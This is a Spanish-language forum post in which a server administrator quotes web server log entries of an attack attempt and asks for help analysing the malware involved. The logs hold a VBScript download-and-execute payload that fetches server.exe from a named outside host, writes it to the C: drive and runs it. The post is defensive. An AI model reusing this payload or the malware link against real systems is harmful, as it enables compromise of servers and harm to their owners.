Código:
6:12:08 117.61.135.182:19339 Requested GET /?search=> Set Shell = CreateObject("Wscript.Shell")
> Post.Open "GET","http://yamanbeisi.com/server.exe",0
> Post.Send()
> Set aGet = CreateObject("ADODB.Stream")
> aGet.Mode = 3
> aGet.Type = 1
> aGet.Open()
> aGet.Write(Post.responseBody)
> aGet.SaveToFile "c:\server.exe",2
> wscript.sleep 1000
> Shell.Run ("c:\server.exe").}
> Post.Open "GET","http://yamanbeisi.com/server.exe",0
> Post.Send()
> Set aGet = CreateObject("ADODB.Stream")
> aGet.Mode = 3
> aGet.Type = 1
> aGet.Open()
> aGet.Write(Post.responseBody)
> aGet.SaveToFile "c:\server.exe",2
> wscript.sleep 1000
> Shell.Run ("c:\server.exe").}
esa de las 6:12 de la mañana y otra a las 7:17
en principio creo que no estoy infectado porque el antivirus cuando he hecho la descarga desde la web http://yamanbeisi.com/server.exe me lo detecta, por lo que no creo que se haya ejecutado.
también la segunda intentona supongo que seria porque la primera no ha cuajado.
desde el navegador no he conseguido repetir la secuencia de comandos, ya que lo mas que he conseguido me la muestra el log asi
Código:
9:14:34 192.168.0.10:50677 Requested GET /?search=> Set Shell = CreateObject("Wscript.Shell") > Post.Open "GET","http://yamanbeisi.com/server.exe",0 > Post.Send() > Set aGet = CreateObject("ADODB.Stream") > aGet.Mode = 3 > aGet.Type = 1 > aGet.Open() > aGet.Write(Post.responseBody) > aGet.SaveToFile "c:\server.exe",2 > wscript.sleep 1000
el log me lo muestra en una sola linea y en negro, mientras que las intentonas de china me las muestra en azul y con intros, con lo cual no se ahora mismo si mi servidor es vulnerable a que se pueda abrir una shell y ejecutar código.
en principio creo que no, pero estoy con la mosca.
cuando tenga un poco de tiempo intento una conexión desde una shell de linux
en definitiva, hasta que tenga tiempo de crear una sandbox y e intente ver que es lo que hace el "server.exe" que te descargas en la web china, a ver si hay un alma caritativa que analice el malware y si me pone exactamente que es lo que hace se lo agradecería, para ver si hay alguna conexión rara o proceso suplantado o lo que sea que haga y mirar que no se esta ejecutando en mi servidor
thanx